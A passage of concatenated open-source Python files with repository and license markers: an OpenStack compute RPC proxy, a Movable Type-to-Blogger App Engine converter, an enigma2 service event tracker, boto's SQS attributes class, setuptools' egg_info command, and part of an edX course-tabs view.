instance=instance,
bdm=bdm)
def change_instance_metadata(self, ctxt, instance, diff):
return self.manager.change_instance_metadata(
ctxt, diff=diff, instance=instance)
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
return self.manager.check_can_live_migrate_destination(
ctxt, instance, block_migration, disk_over_commit)
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
return self.manager.check_can_live_migrate_source(ctxt, instance,
dest_check_data)
def check_instance_shared_storage(self, ctxt, instance, data):
return self.manager.check_instance_shared_storage(ctxt, instance, data)
def confirm_resize(self, ctxt, instance, reservations, migration):
return self.manager.confirm_resize(ctxt, instance,
reservations, migration)
def detach_interface(self, ctxt, instance, port_id):
return self.manager.detach_interface(ctxt, instance, port_id)
def detach_volume(self, ctxt, volume_id, instance):
# NOTE(danms): Pass instance by kwarg to help the object_compat
# decorator, as real RPC dispatch does.
return self.manager.detach_volume(ctxt, volume_id, instance=instance)
def finish_resize(self, ctxt, disk_info, image, instance,
reservations, migration):
return self.manager.finish_resize(ctxt, disk_info, image, instance,
reservations, migration)
def finish_revert_resize(self, ctxt, instance,
reservations, migration):
return self.manager.finish_revert_resize(ctxt, instance,
reservations, migration)
def get_console_output(self, ctxt, instance, tail_length):
return self.manager.get_console_output(ctxt, instance, tail_length)
def get_console_pool_info(self, ctxt, console_type):
return self.manager.get_console_pool_info(ctxt, console_type)
def get_console_topic(self, ctxt):
return self.manager.get_console_topic(ctxt)
def get_diagnostics(self, ctxt, instance):
return self.manager.get_diagnostics(ctxt, instance)
def get_instance_diagnostics(self, ctxt, instance):
return self.manager.get_instance_diagnostics(ctxt, instance)
def get_vnc_console(self, ctxt, console_type, instance):
return self.manager.get_vnc_console(ctxt, console_type, instance)
def get_spice_console(self, ctxt, console_type, instance):
return self.manager.get_spice_console(ctxt, console_type, instance)
def get_rdp_console(self, ctxt, console_type, instance):
return self.manager.get_rdp_console(ctxt, console_type, instance)
def get_serial_console(self, ctxt, console_type, instance):
return self.manager.get_serial_console(ctxt, console_type, instance)
def validate_console_port(self, ctxt, instance, port, console_type):
return self.manager.validate_console_port(ctxt, instance, port,
console_type)
def host_maintenance_mode(self, ctxt, host, mode):
return self.manager.host_maintenance_mode(ctxt, host, mode)
def host_power_action(self, ctxt, action):
return self.manager.host_power_action(ctxt, action)
def inject_network_info(self, ctxt, instance):
return self.manager.inject_network_info(ctxt, instance)
def live_migration(self, ctxt, dest, instance, block_migration,
migrate_data=None):
return self.manager.live_migration(ctxt, dest, instance,
block_migration,
migrate_data=migrate_data)
def pause_instance(self, ctxt, instance):
return self.manager.pause_instance(ctxt, instance)
def post_live_migration_at_destination(self, ctxt, instance,
block_migration):
return self.manager.post_live_migration_at_destination(
ctxt, instance, block_migration)
def pre_live_migration(self, ctxt, instance, block_migration, disk,
migrate_data=None):
return self.manager.pre_live_migration(ctxt, instance, block_migration,
disk, migrate_data=migrate_data)
def prep_resize(self, ctxt, image, instance, instance_type,
reservations=None, request_spec=None,
filter_properties=None, node=None, clean_shutdown=True):
return self.manager.prep_resize(ctxt, image, instance, instance_type,
reservations=reservations,
request_spec=request_spec,
filter_properties=filter_properties,
node=node,
clean_shutdown=clean_shutdown)
def reboot_instance(self, ctxt, instance, block_device_info, reboot_type):
return self.manager.reboot_instance(ctxt, instance, block_device_info,
reboot_type)
def rebuild_instance(self, ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
return self.manager.rebuild_instance(
ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=preserve_ephemeral)
def refresh_security_group_rules(self, ctxt, security_group_id):
return self.manager.refresh_security_group_rules(ctxt,
security_group_id)
def refresh_security_group_members(self, ctxt, security_group_id):
return self.manager.refresh_security_group_members(ctxt,
security_group_id)
def refresh_instance_security_rules(self, ctxt, instance):
return self.manager.refresh_instance_security_rules(ctxt, instance)
def refresh_provider_fw_rules(self, ctxt):
return self.manager.refresh_provider_fw_rules(ctxt)
def remove_aggregate_host(self, ctxt, host, slave_info, aggregate):
return self.manager.remove_aggregate_host(ctxt,
host, slave_info,
aggregate)
def remove_fixed_ip_from_instance(self, ctxt, address, instance):
return self.manager.remove_fixed_ip_from_instance(ctxt, address,
instance)
def remove_volume_connection(self, ctxt, instance, volume_id):
return self.manager.remove_volume_connection(ctxt, instance, volume_id)
def rescue_instance(self, ctxt, instance, rescue_password,
rescue_image_ref, clean_shutdown):
return self.manager.rescue_instance(ctxt, instance, rescue_password,
rescue_image_ref=rescue_image_ref,
clean_shutdown=clean_shutdown)
def reset_network(self, ctxt, instance):
return self.manager.reset_network(ctxt, instance)
def resize_instance(self, ctxt, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
return self.manager.resize_instance(ctxt, instance, image,
reservations, migration,
instance_type,
clean_shutdown=clean_shutdown)
def resume_instance(self, ctxt, instance):
return self.manager.resume_instance(ctxt, instance)
def revert_resize(self, ctxt, instance, migration, reservations=None):
return self.manager.revert_resize(ctxt, instance, migration,
reservations=reservations)
def rollback_live_migration_at_destination(self, ctxt, instance,
destroy_disks,
migrate_data):
return self.manager.rollback_live_migration_at_destination(
ctxt, instance, destroy_disks=destroy_disks,
migrate_data=migrate_data)
def set_admin_password(self, ctxt, instance, new_pass):
return self.manager.set_admin_password(ctxt, instance, new_pass)
def set_host_enabled(self, ctxt, enabled):
return self.manager.set_host_enabled(ctxt, enabled)
def swap_volume(self, ctxt, instance, old_volume_id, new_volume_id):
return self.manager.swap_volume(ctxt, old_volume_id, new_volume_id,
instance)
def get_host_uptime(self, ctxt):
return self.manager.get_host_uptime(ctxt)
def reserve_block_device_name(self, ctxt, instance, device, volume_id,
disk_bus=None, device_type=None):
return self.manager.reserve_block_device_name(ctxt, instance, device,
volume_id,
disk_bus=disk_bus,
device_type=device_type,
return_bdm_object=True)
def backup_instance(self, ctxt, image_id, instance, backup_type,
rotation):
return self.manager.backup_instance(ctxt, image_id, instance,
backup_type, rotation)
def snapshot_instance(self, ctxt, image_id, instance):
return self.manager.snapshot_instance(ctxt, image_id, instance)
def start_instance(self, ctxt, instance):
return self.manager.start_instance(ctxt, instance)
def stop_instance(self, ctxt, instance, clean_shutdown):
return self.manager.stop_instance(ctxt, instance, clean_shutdown)
def suspend_instance(self, ctxt, instance):
return self.manager.suspend_instance(ctxt, instance)
def terminate_instance(self, ctxt, instance, bdms, reservations=None):
return self.manager.terminate_instance(ctxt, instance, bdms,
reservations=reservations)
def unpause_instance(self, ctxt, instance):
return self.manager.unpause_instance(ctxt, instance)
def unrescue_instance(self, ctxt, instance):
return self.manager.unrescue_instance(ctxt, instance)
def soft_delete_instance(self, ctxt, instance, reservations):
return self.manager.soft_delete_instance(ctxt, instance, reservations)
def restore_instance(self, ctxt, instance):
return self.manager.restore_instance(ctxt, instance)
def shelve_instance(self, ctxt, instance, image_id=None,
clean_shutdown=True):
return self.manager.shelve_instance(ctxt, instance, image_id=image_id,
clean_shutdown=clean_shutdown)
def shelve_offload_instance(self, ctxt, instance, clean_shutdown):
return self.manager.shelve_offload_instance(ctxt, instance,
clean_shutdown)
def unshelve_instance(self, ctxt, instance, image=None,
filter_properties=None, node=None):
return self.manager.unshelve_instance(
ctxt, instance, image=image,
filter_properties=filter_properties,
node=node)
def volume_snapshot_create(self, ctxt, instance, volume_id, create_info):
return self.manager.volume_snapshot_create(ctxt, instance, volume_id,
create_info)
def volume_snapshot_delete(self, ctxt, instance, volume_id, snapshot_id,
delete_info):
return self.manager.volume_snapshot_delete(ctxt, instance, volume_id,
snapshot_id, delete_info)
def external_instance_event(self, ctxt, instances, events):
return self.manager.external_instance_event(ctxt, instances, events)
def build_and_run_instance(self, ctxt, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
return self.manager.build_and_run_instance(
ctxt, instance, image, request_spec, filter_properties,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
node=node, limits=limits)
def quiesce_instance(self, ctxt, instance):
return self.manager.quiesce_instance(ctxt, instance)
def unquiesce_instance(self, ctxt, instance, mapping=None):
return self.manager.unquiesce_instance(ctxt, instance, mapping=mapping)
| apache-2.0 |
tectronics/google-blog-converters-appengine | src/movabletype2blogger/movabletype2blogger.py | 30 | 2023 | #!/usr/bin/env python
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import traceback
import StringIO
import gdata.service
import gdata.urlfetch
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import mt2b
import wsgiref.handlers
__author__ = 'JJ Lueck ([email protected])'
# Use urlfetch instead of httplib
gdata.service.http_request_handler = gdata.urlfetch
class TransformPage(webapp.RequestHandler):
def post(self):
# All input/output will be in UTF-8
self.response.charset = 'utf8'
# Parse the mulit-part form-data part out of the POST
input = self.request.get('input-file', allow_multiple=False)
# Run the blogger import processor
translator = mt2b.MovableType2Blogger()
try:
translator.Translate(StringIO.StringIO(input), self.response.out)
self.response.content_type = 'application/atom+xml'
self.response.headers['Content-Disposition'] = \
'attachment;filename=blogger-export.xml'
except:
# Just provide an error message to the user.
self.response.content_type = 'text/plain'
self.response.out.write("Error encountered during conversion.<br/><br/>")
exc = traceback.format_exc()
self.response.out.write(exc.replace('\n', '<br/>'))
application = webapp.WSGIApplication([('/mt2b/', TransformPage)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
| apache-2.0 |
popazerty/try | lib/python/Components/ServiceEventTracker.py | 10 | 4229 | InfoBarCount = 0
class InfoBarBase:
onInfoBarOpened = [ ]
onInfoBarClosed = [ ]
@staticmethod
def connectInfoBarOpened(fnc):
if not fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.append(fnc)
@staticmethod
def disconnectInfoBarOpened(fnc):
if fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.remove(fnc)
@staticmethod
def infoBarOpened(infobar):
for x in InfoBarBase.onInfoBarOpened:
x(infobar)
@staticmethod
def connectInfoBarClosed(fnc):
if not fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.append(fnc)
@staticmethod
def disconnectInfoBarClosed(fnc):
if fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.remove(fnc)
@staticmethod
def infoBarClosed(infobar):
for x in InfoBarBase.onInfoBarClosed:
x(infobar)
def __init__(self, steal_current_service = False):
if steal_current_service:
ServiceEventTracker.setActiveInfoBar(self, None, None)
else:
nav = self.session.nav
ServiceEventTracker.setActiveInfoBar(self, not steal_current_service and nav.getCurrentService(), nav.getCurrentlyPlayingServiceOrGroup())
self.onClose.append(self.__close)
InfoBarBase.infoBarOpened(self)
global InfoBarCount
InfoBarCount += 1
def __close(self):
ServiceEventTracker.popActiveInfoBar()
InfoBarBase.infoBarClosed(self)
global InfoBarCount
InfoBarCount -= 1
class ServiceEventTracker:
"""Tracks service events into a screen"""
InfoBarStack = [ ]
InfoBarStackSize = 0
oldServiceStr = None
EventMap = { }
navcore = None
@staticmethod
def event(evt):
set = ServiceEventTracker
func_list = set.EventMap.setdefault(evt, [])
if func_list:
nav = set.navcore
cur_ref = nav.getCurrentlyPlayingServiceOrGroup()
try:
old_service_running = set.oldRef and cur_ref and cur_ref == set.oldRef and set.oldServiceStr == nav.getCurrentService().getPtrString()
except:
old_service_running = None
if not old_service_running and set.oldServiceStr:
set.oldServiceStr = None
set.oldRef = None
ssize = set.InfoBarStackSize
stack = set.InfoBarStack
for func in func_list:
if (func[0] or # let pass all events to screens not derived from InfoBarBase
(not old_service_running and stack[ssize-1] == func[1]) or # let pass events from currently running service just to current active screen (derived from InfoBarBase)
(old_service_running and ssize > 1 and stack[ssize-2] == func[1])): # let pass events from old running service just to previous active screen (derived from InfoBarBase)
func[2]()
@staticmethod
def setActiveInfoBar(infobar, old_service, old_ref):
set = ServiceEventTracker
set.oldRef = old_ref
set.oldServiceStr = old_service and old_service.getPtrString()
assert infobar not in set.InfoBarStack, "FATAL: Infobar '" + str(infobar) + "' is already active!"
set.InfoBarStack.append(infobar)
set.InfoBarStackSize += 1
# print "ServiceEventTracker set active '" + str(infobar) + "'"
@staticmethod
def popActiveInfoBar():
set = ServiceEventTracker
stack = set.InfoBarStack
if set.InfoBarStackSize:
nav = set.navcore
set.InfoBarStackSize -= 1
del stack[set.InfoBarStackSize]
old_service = nav.getCurrentService()
set.oldServiceStr = old_service and old_service.getPtrString()
set.oldRef = nav.getCurrentlyPlayingServiceOrGroup()
# if set.InfoBarStackSize:
# print "ServiceEventTracker reset active '" + str(stack[set.InfoBarStackSize-1]) + "'"
def __init__(self, screen, eventmap):
self.__screen = screen
self.__eventmap = eventmap
self.__passall = not isinstance(screen, InfoBarBase) # let pass all events to screens not derived from InfoBarBase
EventMap = ServiceEventTracker.EventMap
if not len(EventMap):
screen.session.nav.event.append(ServiceEventTracker.event)
ServiceEventTracker.navcore = screen.session.nav
EventMap = EventMap.setdefault
for x in eventmap.iteritems():
EventMap(x[0], []).append((self.__passall, screen, x[1]))
screen.onClose.append(self.__del_event)
def __del_event(self):
EventMap = ServiceEventTracker.EventMap.setdefault
for x in self.__eventmap.iteritems():
EventMap(x[0], []).remove((self.__passall, self.__screen, x[1]))
| gpl-2.0 |
abridgett/boto | boto/sqs/attributes.py | 223 | 1718 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an SQS Attribute Name/Value set
"""
class Attributes(dict):
def __init__(self, parent):
self.parent = parent
self.current_key = None
self.current_value = None
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Attribute':
self[self.current_key] = self.current_value
elif name == 'Name':
self.current_key = value
elif name == 'Value':
self.current_value = value
else:
setattr(self, name, value)
| mit |
ephoning/heroku-buildpack-python | vendor/distribute-0.6.36/setuptools/command/egg_info.py | 66 | 15621 | """setuptools.command.egg_info
Create a distribution's .egg-info directory and contents"""
# This module should be kept compatible with Python 2.3
import os, re, sys
from setuptools import Command
from distutils.errors import *
from distutils import log
from setuptools.command.sdist import sdist
from distutils.util import convert_path
from distutils.filelist import FileList as _FileList
from pkg_resources import parse_requirements, safe_name, parse_version, \
safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename
from sdist import walk_revctrl
class egg_info(Command):
description = "create a distribution's .egg-info directory"
user_options = [
('egg-base=', 'e', "directory containing .egg-info directories"
" (default: top of the source tree)"),
('tag-svn-revision', 'r',
"Add subversion revision ID to version number"),
('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),
('tag-build=', 'b', "Specify explicit tag to add to version number"),
('no-svn-revision', 'R',
"Don't add subversion revision ID [default]"),
('no-date', 'D', "Don't include date stamp [default]"),
]
boolean_options = ['tag-date', 'tag-svn-revision']
negative_opt = {'no-svn-revision': 'tag-svn-revision',
'no-date': 'tag-date'}
def initialize_options(self):
self.egg_name = None
self.egg_version = None
self.egg_base = None
self.egg_info = None
self.tag_build = None
self.tag_svn_revision = 0
self.tag_date = 0
self.broken_egg_info = False
self.vtags = None
def save_version_info(self, filename):
from setopt import edit_config
edit_config(
filename,
{'egg_info':
{'tag_svn_revision':0, 'tag_date': 0, 'tag_build': self.tags()}
}
)
def finalize_options (self):
self.egg_name = safe_name(self.distribution.get_name())
self.vtags = self.tags()
self.egg_version = self.tagged_version()
try:
list(
parse_requirements('%s==%s' % (self.egg_name,self.egg_version))
)
except ValueError:
raise DistutilsOptionError(
"Invalid distribution name or version syntax: %s-%s" %
(self.egg_name,self.egg_version)
)
if self.egg_base is None:
dirs = self.distribution.package_dir
self.egg_base = (dirs or {}).get('',os.curdir)
self.ensure_dirname('egg_base')
self.egg_info = to_filename(self.egg_name)+'.egg-info'
if self.egg_base != os.curdir:
self.egg_info = os.path.join(self.egg_base, self.egg_info)
if '-' in self.egg_name: self.check_broken_egg_info()
# Set package version for the benefit of dumber commands
# (e.g. sdist, bdist_wininst, etc.)
#
self.distribution.metadata.version = self.egg_version
# If we bootstrapped around the lack of a PKG-INFO, as might be the
# case in a fresh checkout, make sure that any special tags get added
# to the version info
#
pd = self.distribution._patched_dist
if pd is not None and pd.key==self.egg_name.lower():
pd._version = self.egg_version
pd._parsed_version = parse_version(self.egg_version)
self.distribution._patched_dist = None
def write_or_delete_file(self, what, filename, data, force=False):
"""Write `data` to `filename` or delete if empty
If `data` is non-empty, this routine is the same as ``write_file()``.
If `data` is empty but not ``None``, this is the same as calling
``delete_file(filename)`. If `data` is ``None``, then this is a no-op
unless `filename` exists, in which case a warning is issued about the
orphaned file (if `force` is false), or deleted (if `force` is true).
"""
if data:
self.write_file(what, filename, data)
elif os.path.exists(filename):
if data is None and not force:
log.warn(
"%s not set in setup(), but %s exists", what, filename
)
return
else:
self.delete_file(filename)
def write_file(self, what, filename, data):
"""Write `data` to `filename` (if not a dry run) after announcing it
`what` is used in a log message to identify what is being written
to the file.
"""
log.info("writing %s to %s", what, filename)
if sys.version_info >= (3,):
data = data.encode("utf-8")
if not self.dry_run:
f = open(filename, 'wb')
f.write(data)
f.close()
def delete_file(self, filename):
"""Delete `filename` (if not a dry run) after announcing it"""
log.info("deleting %s", filename)
if not self.dry_run:
os.unlink(filename)
def tagged_version(self):
version = self.distribution.get_version()
# egg_info may be called more than once for a distribution,
# in which case the version string already contains all tags.
if self.vtags and version.endswith(self.vtags):
return safe_version(version)
return safe_version(version + self.vtags)
def run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in iter_entry_points('egg_info.writers'):
writer = ep.load(installer=installer)
writer(self, ep.name, os.path.join(self.egg_info,ep.name))
# Get rid of native_libs.txt if it was put there by older bdist_egg
nl = os.path.join(self.egg_info, "native_libs.txt")
if os.path.exists(nl):
self.delete_file(nl)
self.find_sources()
def tags(self):
version = ''
if self.tag_build:
version+=self.tag_build
if self.tag_svn_revision and (
os.path.exists('.svn') or os.path.exists('PKG-INFO')
): version += '-r%s' % self.get_svn_revision()
if self.tag_date:
import time; version += time.strftime("-%Y%m%d")
return version
def get_svn_revision(self):
revision = 0
urlre = re.compile('url="([^"]+)"')
revre = re.compile('committed-rev="(\d+)"')
for base,dirs,files in os.walk(os.curdir):
if '.svn' not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove('.svn')
f = open(os.path.join(base,'.svn','entries'))
data = f.read()
f.close()
if data.startswith('10') or data.startswith('9') or data.startswith('8'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8' or '9' or '10'
dirurl = data[0][3]
localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]+[0])
elif data.startswith('<?xml'):
dirurl = urlre.search(data).group(1) # get repository URL
localrev = max([int(m.group(1)) for m in revre.finditer(data)]+[0])
else:
log.warn("unrecognized .svn/entries format; skipping %s", base)
dirs[:] = []
continue
if base==os.curdir:
base_url = dirurl+'/' # save the root url
elif not dirurl.startswith(base_url):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return str(revision or get_pkg_info_revision())
def find_sources(self):
"""Generate SOURCES.txt manifest file"""
manifest_filename = os.path.join(self.egg_info,"SOURCES.txt")
mm = manifest_maker(self.distribution)
mm.manifest = manifest_filename
mm.run()
self.filelist = mm.filelist
def check_broken_egg_info(self):
bei = self.egg_name+'.egg-info'
if self.egg_base != os.curdir:
bei = os.path.join(self.egg_base, bei)
if os.path.exists(bei):
log.warn(
"-"*78+'\n'
"Note: Your current .egg-info directory has a '-' in its name;"
'\nthis will not work correctly with "setup.py develop".\n\n'
'Please rename %s to %s to correct this problem.\n'+'-'*78,
bei, self.egg_info
)
self.broken_egg_info = self.egg_info
self.egg_info = bei # make it work for now
class FileList(_FileList):
"""File list that accepts only existing, platform-independent paths"""
def append(self, item):
if item.endswith('\r'): # Fix older sdists built on Windows
item = item[:-1]
path = convert_path(item)
if sys.version_info >= (3,):
try:
if os.path.exists(path) or os.path.exists(path.encode('utf-8')):
self.files.append(path)
except UnicodeEncodeError:
# Accept UTF-8 filenames even if LANG=C
if os.path.exists(path.encode('utf-8')):
self.files.append(path)
else:
log.warn("'%s' not %s encodable -- skipping", path,
sys.getfilesystemencoding())
else:
if os.path.exists(path):
self.files.append(path)
class manifest_maker(sdist):
template = "MANIFEST.in"
def initialize_options (self):
self.use_defaults = 1
self.prune = 1
self.manifest_only = 1
self.force_manifest = 1
def finalize_options(self):
pass
def run(self):
self.filelist = FileList()
if not os.path.exists(self.manifest):
self.write_manifest() # it must exist so it'll get in the list
self.filelist.findall()
self.add_defaults()
if os.path.exists(self.template):
self.read_template()
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def write_manifest (self):
"""Write the file list in 'self.filelist' (presumably as filled in
by 'add_defaults()' and 'read_template()') to the manifest file
named by 'self.manifest'.
"""
# The manifest must be UTF-8 encodable. See #303.
if sys.version_info >= (3,):
files = []
for file in self.filelist.files:
try:
file.encode("utf-8")
except UnicodeEncodeError:
log.warn("'%s' not UTF-8 encodable -- skipping" % file)
else:
files.append(file)
self.filelist.files = files
files = self.filelist.files
if os.sep!='/':
files = [f.replace(os.sep,'/') for f in files]
self.execute(write_file, (self.manifest, files),
"writing manifest file '%s'" % self.manifest)
def warn(self, msg): # suppress missing-file warnings from sdist
if not msg.startswith("standard file not found:"):
sdist.warn(self, msg)
def add_defaults(self):
sdist.add_defaults(self)
self.filelist.append(self.template)
self.filelist.append(self.manifest)
rcfiles = list(walk_revctrl())
if rcfiles:
self.filelist.extend(rcfiles)
elif os.path.exists(self.manifest):
self.read_manifest()
ei_cmd = self.get_finalized_command('egg_info')
self.filelist.include_pattern("*", prefix=ei_cmd.egg_info)
def prune_file_list (self):
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
sep = re.escape(os.sep)
self.filelist.exclude_pattern(sep+r'(RCS|CVS|\.svn)'+sep, is_regex=1)
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
contents = "\n".join(contents)
if sys.version_info >= (3,):
contents = contents.encode("utf-8")
f = open(filename, "wb") # always write POSIX-style manifest
f.write(contents)
f.close()
def write_pkg_info(cmd, basename, filename):
log.info("writing %s", filename)
if not cmd.dry_run:
metadata = cmd.distribution.metadata
metadata.version, oldver = cmd.egg_version, metadata.version
metadata.name, oldname = cmd.egg_name, metadata.name
try:
# write unescaped data to PKG-INFO, so older pkg_resources
# can still parse it
metadata.write_pkg_info(cmd.egg_info)
finally:
metadata.name, metadata.version = oldname, oldver
safe = getattr(cmd.distribution,'zip_safe',None)
import bdist_egg; bdist_egg.write_safety_flag(cmd.egg_info, safe)
def warn_depends_obsolete(cmd, basename, filename):
if os.path.exists(filename):
log.warn(
"WARNING: 'depends.txt' is not used by setuptools 0.6!\n"
"Use the install_requires/extras_require setup() args instead."
)
def write_requirements(cmd, basename, filename):
dist = cmd.distribution
data = ['\n'.join(yield_lines(dist.install_requires or ()))]
for extra,reqs in (dist.extras_require or {}).items():
data.append('\n\n[%s]\n%s' % (extra, '\n'.join(yield_lines(reqs))))
cmd.write_or_delete_file("requirements", filename, ''.join(data))
def write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[k.split('.',1)[0]
for k in cmd.distribution.iter_distribution_names()
]
)
cmd.write_file("top-level names", filename, '\n'.join(pkgs)+'\n')
def overwrite_arg(cmd, basename, filename):
write_arg(cmd, basename, filename, True)
def write_arg(cmd, basename, filename, force=False):
argname = os.path.splitext(basename)[0]
value = getattr(cmd.distribution, argname, None)
if value is not None:
value = '\n'.join(value)+'\n'
cmd.write_or_delete_file(argname, filename, value, force)
def write_entries(cmd, basename, filename):
ep = cmd.distribution.entry_points
if isinstance(ep,basestring) or ep is None:
data = ep
elif ep is not None:
data = []
for section, contents in ep.items():
if not isinstance(contents,basestring):
contents = EntryPoint.parse_group(section, contents)
contents = '\n'.join(map(str,contents.values()))
data.append('[%s]\n%s\n\n' % (section,contents))
data = ''.join(data)
cmd.write_or_delete_file('entry points', filename, data, True)
def get_pkg_info_revision():
# See if we can get a -r### off of PKG-INFO, in case this is an sdist of
# a subversion revision
#
if os.path.exists('PKG-INFO'):
f = open('PKG-INFO','rU')
for line in f:
match = re.match(r"Version:.*-r(\d+)\s*$", line)
if match:
return int(match.group(1))
f.close()
return 0
#
| mit |
ak2703/edx-platform | cms/djangoapps/contentstore/views/tabs.py | 125 | 7890 | """
Views related to course tabs
"""
from student.auth import has_course_author_access
from util.json_request import expect_json, JsonResponse
from django.http import HttpResponseNotFound
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_http_methods
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.tabs import CourseTabList, CourseTab, InvalidTabsException, StaticTab
from opaque_keys.edx.keys import CourseKey, UsageKey
from ..utils import get_lms_link_for_item
__all__ = ['tabs_handler']
@expect_json
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
def tabs_handler(request, course_key_string):
"""
The restful handler for static tabs.
GET
html: return page for editing static tabs
json: not supported
PUT or POST
json: update the tab order. It is expected that the request body contains a JSON-encoded dict with entry "tabs".
The value for "tabs" is an array of tab locators, indicating the desired order of the tabs.
Creating a tab, deleting a tab, or changing its contents is not supported through this method.
Instead use the general xblock URL (see item.xblock_handler).
"""
course_key = CourseKey.from_string(course_key_string)
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course_item = modulestore().get_course(course_key)
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
raise NotImplementedError('coming soon')
else:
if 'tabs' in request.json:
return reorder_tabs_handler(course_item, request)
elif 'tab_id_locator' in request.json:
return edit_tab_handler(course_item, request)
else:
raise NotImplementedError('Creating or changing tab content is not supported.')
elif request.method == 'GET': # assume html
# get all tabs from the tabs list: static tabs (a.k.a. user-created tabs) and built-in tabs
# present in the same order they are displayed in LMS
tabs_to_render = []
for tab in CourseTabList.iterate_displayable(course_item, inline_collections=False):
if isinstance(tab, StaticTab):
# static tab needs its locator information to render itself as an xmodule
static_tab_loc = course_key.make_usage_key('static_tab', tab.url_slug)
tab.locator = static_tab_loc
tabs_to_render.append(tab)
return render_to_response('edit-tabs.html', {
'context_course': course_item,
'tabs_to_render': tabs_to_render,
'lms_link': get_lms_link_for_item(course_item.location),
})
else:
return HttpResponseNotFound()
def reorder_tabs_handler(course_item, request):
"""
Helper function for handling reorder of tabs request
"""
# Tabs are identified by tab_id or locators.
# The locators are used to identify static tabs since they are xmodules.
# Although all tabs have tab_ids, newly created static tabs do not know
# their tab_ids since the xmodule editor uses only locators to identify new objects.
requested_tab_id_locators = request.json['tabs']
# original tab list in original order
old_tab_list = course_item.tabs
# create a new list in the new order
new_tab_list = []
for tab_id_locator in requested_tab_id_locators:
tab = get_tab_by_tab_id_locator(old_tab_list, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
new_tab_list.append(tab)
# the old_tab_list may contain additional tabs that were not rendered in the UI because of
# global or course settings. so add those to the end of the list.
non_displayed_tabs = set(old_tab_list) - set(new_tab_list)
new_tab_list.extend(non_displayed_tabs)
# validate the tabs to make sure everything is Ok (e.g., did the client try to reorder unmovable tabs?)
try:
CourseTabList.validate_tabs(new_tab_list)
except InvalidTabsException, exception:
return JsonResponse(
{"error": "New list of tabs is not valid: {0}.".format(str(exception))}, status=400
)
# persist the new order of the tabs
course_item.tabs = new_tab_list
modulestore().update_item(course_item, request.user.id)
return JsonResponse()
def edit_tab_handler(course_item, request):
"""
Helper function for handling requests to edit settings of a single tab
"""
# Tabs are identified by tab_id or locator
tab_id_locator = request.json['tab_id_locator']
# Find the given tab in the course
tab = get_tab_by_tab_id_locator(course_item.tabs, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
